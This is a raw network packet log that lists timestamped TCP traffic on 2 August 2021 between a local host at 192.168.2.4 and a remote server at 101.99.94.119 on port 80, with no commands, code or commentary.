Aug 2, 2021 15:17:47.414307117 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414343119 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414372921 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414402008 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414433002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414464951 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414465904 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414496899 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414524078 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414535999 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414570093 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414591074 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414603949 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414633036 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414633989 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414664030 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414683104 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414696932 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414722919 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414853096 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.466387987 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466418982 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466440916 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466463089 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466510057 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466531038 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466553926 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466576099 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466625929 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466671944 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466692924 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466715097 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466736078 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466757059 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466798067 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466814041 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.466820002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466846943 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466870070 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466912985 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466962099 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466984034 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467005014 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467030048 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467039108 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467081070 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467103004 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467133999 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467169046 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467180967 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467226982 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467247963 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467257023 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467293978 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467317104 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467318058 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467403889 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.520016909 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520051956 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520076990 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520100117 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520123005 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520144939 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520170927 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520195007 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520216942 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520240068 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520262957 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520283937 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520308018 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520329952 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520355940 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520379066 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520397902 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520420074 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520442963 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520468950 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520493031 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520514965 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520536900 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520560026 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520582914 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520606041 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520627975 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520653963 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520678997 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520701885 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520725012 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520746946 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520768881 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520792007 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520813942 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520839930 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520864010 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520886898 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520910025 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520931005 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521044016 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521070957 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521094084 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521095991 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.521116972 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.521120071 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521120071 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.521123886 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.521126032 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.521145105 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521167994 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521190882 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521213055 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521236897 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.521915913 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572544098 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572571039 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572586060 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572602034 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572618008 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572635889 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572638035 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572655916 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572670937 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572686911 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572696924 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572701931 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572716951 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572721004 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572731972 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572743893 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572747946 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572766066 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572774887 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572783947 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572794914 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572798967 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572814941 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572829962 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572837114 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572845936 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572860956 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572875977 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572881937 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572895050 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572911978 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572921991 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572927952 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572943926 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572953939 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.572959900 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572974920 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572988987 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.572993040 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573004961 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573013067 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573024035 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573040962 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573043108 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573057890 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573064089 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573074102 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573088884 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573103905 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573107958 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573120117 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573137045 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573154926 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573154926 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573173046 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573183060 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573189020 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573225021 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.573278904 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.573327065 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.576138973 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576160908 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576175928 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576193094 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576215029 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576237917 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576257944 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576280117 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576292992 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.576306105 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.576340914 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.576348066 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.576351881 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.576400995 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624681950 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624713898 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624737978 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624761105 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624764919 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624783039 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624795914 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624802113 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624819994 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624835968 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624838114 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624855995 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624869108 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624874115 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624890089 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624892950 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624907970 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624923944 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624933958 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624939919 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624955893 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624973059 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.624979019 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.624991894 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625010967 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625015974 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625026941 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625036955 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625049114 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625072002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625077009 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625093937 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625116110 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625121117 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625133991 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625145912 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625154018 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625170946 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625185966 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625190973 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625209093 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625226021 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625227928 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625253916 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625261068 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625281096 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625284910 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625303984 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625324965 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625327110 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625346899 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625360012 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625370026 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625391006 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625399113 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625411987 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625426054 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625433922 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625454903 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625466108 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625474930 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625497103 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.625508070 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625535011 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.625566959 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.627736092 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627765894 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627783060 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627804995 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627827883 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627836943 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.627856016 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627866030 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.627877951 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627896070 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.627897978 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627918959 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.627923965 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.627964973 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.676989079 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677011013 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677028894 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677047014 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677058935 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677071095 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677089930 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677088976 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.677103043 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677114010 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677129030 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677140951 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677154064 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677154064 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.677166939 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677179098 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677190065 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677202940 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677213907 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677227020 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677238941 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677249908 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677262068 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677273989 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677284956 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677297115 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677364111 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.677398920 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677407980 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.677417040 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677429914 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677442074 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677453995 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677465916 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677479029 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677493095 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677509069 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677516937 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.677525043 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677537918 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677551031 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677551031 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.677562952 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.677673101 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.678248882 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.678271055 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.678287983 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.678304911 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.678349972 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.678379059 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.679064035 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679088116 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679104090 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679136038 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679146051 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.679152966 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679171085 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679183960 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.679188967 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679207087 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679219007 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.679235935 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.679265022 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.736195087 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736525059 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736541033 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.736552000 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.736573935 CEST	80	49758	101.99.94.119	192.168.2.4
